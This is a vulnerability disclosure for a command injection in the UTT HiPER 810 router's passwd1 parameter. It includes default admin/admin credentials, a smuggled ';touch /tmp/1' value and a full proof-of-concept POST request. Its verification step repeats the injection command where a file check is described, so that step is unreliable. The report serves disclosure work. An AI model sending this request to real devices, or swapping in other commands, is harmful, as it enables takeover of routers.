Vulnerability Disclosure Report: Remote Command Injection in UTT HiPER 810
- General Information
Vendor: UTT (艾泰)
Vendor Website: http://www.utt.com.cn/
Affected Product: HiPER 810
Affected Firmware Version: nv810v4v1.7.4-141218
Vulnerability Type: OS Command Injection
In the setSysAdm function, user input from the passwd1 parameter is assigned to the variable Var.
Memory Corruption: At line 14, strcpy is used without boundary checks, leading to a buffer overflow.
Command Injection: More critically, at line 19, Var is directly passed to doSystem:
doSystem((int)"chpasswd.sh %s %s", "admin", Var);
To successfully reproduce the Remote Command Execution (RCE) vulnerability, follow these steps:
Establish Management Connection: First, ensure you can access the device's management interface. You need to log in via Telnet to monitor the execution results.
Command: telnet 192.168.1.1 60023
Credentials: admin / admin
Trigger the Exploit: While the session is active, send the following crafted POST request to the /goform/formUser endpoint. The payload uses a semicolon to inject the touch command.
Payload: passwd1=;touch /tmp/1
Verify Execution: In your Telnet terminal, check the /tmp directory to confirm the command was executed.
Command: touch /tmp/1
Expected Result: The file 1 should be present, proving arbitrary command execution.
The API for invoking the function
Here the values of usernameold and username are taken, and judgments are made, and if they are both admin, enter the setSysAdm function
As illustrated in the provided IDA Pro pseudocode, the variable Var is retrieved from the user-controlled parameter passwd1. Critically, at line 19, this variable is passed directly into a system-level execution function: doSystem((int)"chpasswd.sh %s %s", "admin", Var);. Since the application fails to perform any input sanitization or filtering on shell metacharacters (such as the semicolon ;), an attacker can truncate the intended command and inject arbitrary OS commands. This flaw results in a Remote Command Execution (RCE) vulnerability, which poses a significantly higher security risk than a simple buffer overflow or Denial of Service (DoS).
We click on this tab and then capture the packet to make some modifications.
POC attack
Construct the following data packet and then send it.
POST /goform/formUser HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:147.0) Gecko/20100101 Firefox/147.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8,zh-HK;q=0.7,en-US;q=0.6,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 54
Origin: http://192.168.1.1
Authorization: Digest username="admin", realm="UTT", nonce="5a4dc864ac29e7430d3a36a747de635b", uri="/User_edit.asp", algorithm=MD5, response="adebefb5e52232691518627e42a27154", opaque="5ccc069c403ebaf9f0171e9517f40e41", qop=auth, nc=000000b4, cnonce="99c0d14a811f912b"
Connection: keep-alive
Referer: http://192.168.1.1/User.asp
Cookie: language=zhcn; utt_bw_rdevType=
Upgrade-Insecure-Requests: 1
Priority: u=0, i
usernameold=admin&username=admin&passwd1=;touch /tmp/1